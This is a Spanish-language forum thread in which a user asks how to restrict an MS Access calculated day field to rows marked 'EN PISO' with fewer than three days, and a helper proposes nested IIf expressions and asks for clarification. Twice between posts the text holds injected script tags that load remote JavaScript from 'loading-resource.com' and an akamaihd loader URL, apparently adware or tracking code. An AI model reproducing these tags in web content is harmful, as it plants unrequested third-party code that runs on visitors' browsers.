No me filtra un campo calculado

Tengo un query donde un campo muestra los días que tiene registrado pero yo solo quiero que aparezca los días solo si en otro campo contiene la palabra "EN PISO" y aparte que los filtre solo los que tengas menos de 3 días:

DÍA: IIf([Loc]="EN PISO",[CANT DÍAS],0)

De esta formula solo pone los días que van si en campo loc tiene piso y si no lo pone cero y lo quiero y no me funciona es que solo muestre los valores 0,1,2

1 Respuesta

Respuesta

Si no te he entendido mal, lo que necesitas es anidar 2 iif. IIf compara una condición, si se cumple devuelve el primer parámetro que se le indica, sino, devuelve el segundo.

Entonces jugamos con ello:

DÍA : iif ([loc] = "EN PISO", IIF ([CANT DÍAS] < 3, [CANT DÍAS],0), 0)

Un saludo y visita EL FORO

Mira lo que quiero es que solo los que tengan Loc:"EN PISO" me los filtre por día y solo quiero de 2 días para atrás y los que no tengan "EN PISO" no me los filtre, no se si me explique mejor gracias..

Pues lo siento, pero no te explicaste mejor. Ahora si que no se que es lo que quieres. Cuando dices dos días para atrás, ¿Te refieres a dos días antes de hoy?.

Los que tengan Loc: "EN PISO" me los filtre por día,

¿Qué quiere decir esto y que tiene que ver con el primer planteamiento? ¿Que quieres que te los filtre por día de la semana, por número de día...

Acláramelo un poco, por favor

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

Una disculpa es que estaba muy apurado y respondí muy rapido, es que hay otro campo que es Fecha la cual es la fecha en que se registra en el sistema y por eso contamos los días y lo que están "EN PISO" no debe tener mas de dos días, por eso se me complico por que tengo que tener los dos casos lo que no esta "EN PISO" y los que si , pero esta caso los dos se cuenta los días pero yo nomas quiero que me filtre los que están "EN PISO" y lo demás que aparezca sin importar los días que tengan..

una disculpa y saludos gracias por la ayuda espero que ahora si me explique ya que necesito resolver esto... :)

Cada vez lo entiendo menos. Hazme un favor comenta que campos tienes y por que campos y con que condiciones quieres filtrar. Porque yo ya no tengo ni idea de lo que quieres. Y si lees tu último mensaje con la perspectiva de alguien que no sabe lo que tienes ni lo que quieres, dime si entiendes algo.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>